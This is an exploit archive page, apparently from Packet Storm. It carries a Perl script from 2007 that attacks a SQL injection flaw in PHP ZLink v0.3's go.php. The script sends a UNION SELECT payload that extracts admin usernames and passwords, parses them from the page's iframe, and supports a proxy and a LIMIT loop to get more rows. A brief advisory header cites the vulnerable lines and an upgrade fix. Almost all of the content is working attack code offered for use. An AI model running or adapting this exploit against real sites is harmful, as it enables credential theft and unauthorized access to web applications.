what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phpzlink-sql.txt

phpzlink-sql.txt
Posted Dec 24, 2007
Authored by DNX

PHP ZLink version 0.3 remote SQL injection exploit that makes use of go.php.

tags | exploit, remote, php, sql injection
SHA-256 | 481544f701f9bfcd2b1cca35bd2a0940ba7f44e652b5421ecf2955416688c5fb

phpzlink-sql.txt

Change Mirror Download
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[3])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n -----------------oOO---(_)---OOo----------------";
print "\n | PHP ZLink v0.3 (go.php) Remote SQL Injection |";
print "\n | coded by DNX |";
print "\n ------------------------------------------------";
print "\n[!] Discovered.: DNX";
print "\n[!] Vendor.....: http://www.zeak.net";
print "\n[!] Detected...: 28.10.2007";
print "\n[!] Reported...: 28.10.2007";
print "\n[!] Response...: 29.10.2007";
print "\n";
print "\n[!] Background.: PHP ZLink is a free short Url Redirection Script";
print "\n";
print "\n[!] Bug........: \$id in go.php";
print "\n";
print "\n line 25: \$id = \$_GET['id']";
print "\n";
print "\n line 28: SELECT url FROM \$table WHERE id = \$id";
print "\n";
print "\n[!] Solution...: Upgrade to PHP ZLink v1.0";
print "\n";
print "\n[!] Usage......: perl zlink.pl [Host] [Path] <Options>";
print "\n[!] Example....: perl zlink.pl 127.0.0.1 /zlink/ -id 1";
print "\n[!] Options....:";
print "\n -id [no] Valid ID";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $table = "admin";
my $id = 0;
my %options = ();
GetOptions(\%options, "id=i", "p=s");

print "[!] Exploiting...\n";

if($options{"id"})
{
exploit($options{"id"});
}
else
{
print "[!] Exploit failed, missing parameter\n";
exit;
}

print "\n[!] Exploit done\n";

sub exploit
{
my $id = shift;
my $url = "http://".$host.$path."go.php?id=".$id."%20union%20select%20concat(username,0x2f,password)%20from%20admin";
my $regexp = "<iframe(.*)src=\"(.*)\"><\/iframe>";

my $ua = LWP::UserAgent->new;

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $response = $ua->get($url);
my $content = $response->content;
@content = split(/\n/, $content);
$found = 0;

foreach (@content)
{
if($_ =~ /$regexp/ && $2 !~ /http/)
{
($user, $pass) = split(/\//, $2);
print "User/Password: ".$user."/".$pass."\n";
$found = 1;
}
}

if(!$found)
{
$count = 2;
$noendless = 20;
while($count < $noendless)
{
$response = $ua->get($url."%20limit%20".$count++);
if($tmp eq $response->base)
{
$count = $noendless;
}
else
{
$tmp = $response->base;
($x, $y) = split(/$host$path/, $tmp);
print "User/Password: ".$y."\n";
}
}
}
}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close